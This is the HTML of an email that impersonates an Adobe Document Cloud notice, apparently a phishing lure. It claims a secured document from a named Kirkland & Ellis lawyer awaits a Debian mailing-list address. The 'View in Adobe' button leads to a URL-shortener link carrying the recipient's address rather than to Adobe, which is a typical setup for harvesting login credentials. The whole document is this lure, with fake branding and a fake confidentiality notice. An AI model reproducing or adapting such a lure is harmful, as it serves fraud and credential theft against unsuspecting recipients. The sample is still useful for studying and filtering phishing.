<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Adobe Secure Document Notification</title>
    <style>
        body {
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
            background-color: #f5f5f5;
            margin: 0;
            padding: 0;
        }
        .container {
            width: 700px;
            margin: 50px auto;
            background-color: white;
            border: 1px solid #ddd;
            padding: 20px;
            box-shadow: 0 0 10px rgba(0,0,0,0.1);
        }
        .header {
            text-align: left;
            margin-bottom: 15px;
        }
        .logo {
            display: flex;
            align-items: center;
            margin-bottom: 15px;
        }
        .logo .adobe-logo {
            width: 40px;
            height: 40px;
            margin-right: 10px;
            background-color: #FF0000;
            color: white;
            display: flex;
            align-items: center;
            justify-content: center;
            font-weight: bold;
            font-size: 18px;
            border-radius: 4px;
        }
        .logo .text {
            font-size: 24px;
            font-weight: bold;
            color: #FF0000;
        }
        .content {
            margin-top: 20px;
        }
        .content h1 {
            font-size: 17px;
            color: black;
            font-weight: normal;
            margin: 0;
            line-height: 1.4;
            white-space: normal;
        }
        .content h1 strong {
            font-weight: bold;
        }
        .demarcator {
            width: 100%;
            height: 2px;
            background-color: #FF0000;
            margin: 20px 0;
        }
        .content h2 {
            color: #FF0000;
            font-size: 16px;
            margin-bottom: 10px;
        }
        .content p {
            font-size: 14px;
            margin: 5px 0;
            color: #000;
        }
        .button {
            text-align: center;
            margin-top: 20px;
        }
        .button a {
            background-color: #FF0000;
            color: white;
            padding: 12px 25px;
            text-decoration: none;
            font-size: 16px;
            border-radius: 4px;
            display: inline-block;
        }
        .confidentiality {
            margin-top: 30px;
            font-size: 12px;
            color: #666;
        }
        .footer {
            font-size: 12px;
            color: #666;
            margin-top: 20px;
            text-align: center;
        }
    </style>
    <script>
        document.addEventListener('DOMContentLoaded', function () {
            var content = "";
            var dynamicH1 = document.createElement('h1');
            dynamicH1.innerHTML = content;
            document.querySelector('.content').insertBefore(dynamicH1, document.querySelector('.demarcator'));
        });
    </script>
</head>
<body>

<div class="container">
    <div class="header">
        <div class="logo">
            <div class="adobe-logo">Ad</div>
            <div class="text">Adobe Document Cloud</div>
        </div>
    </div>

    <div class="content">

        <div class="demarcator"></div>

        <h1>You have an incoming secured document<br> From: Brett Ackerman (Kirkland & Ellis LLP)</h1>

        <h2>File details</h2>
        <p><strong>Recipient:</strong> pkg-utopia-maintainers@lists.alioth.debian.org</p>
        <p><strong>Date:</strong> 9/9/2025</p>
    </div>

    <div class="button">
        <a href="https://shorter.me/Ox61L#pkg-utopia-maintainers@lists.alioth.debian.org">View in Adobe</a>
    </div>

    <div class="confidentiality">
        <p><strong>CONFIDENTIALITY STATEMENT:</strong> This email and any accompanying documents are intended solely for this recipient. All advice and information provided is provided in good faith and without liability. If you have received this message in error, please delete it immediately...</p>
    </div>

    <div class="footer">
        <p>© 2025 Adobe Inc. All rights reserved. 345 Park Avenue, San Jose, CA 95110-2704, USA</p>
    </div>
</div>

</body>
</html>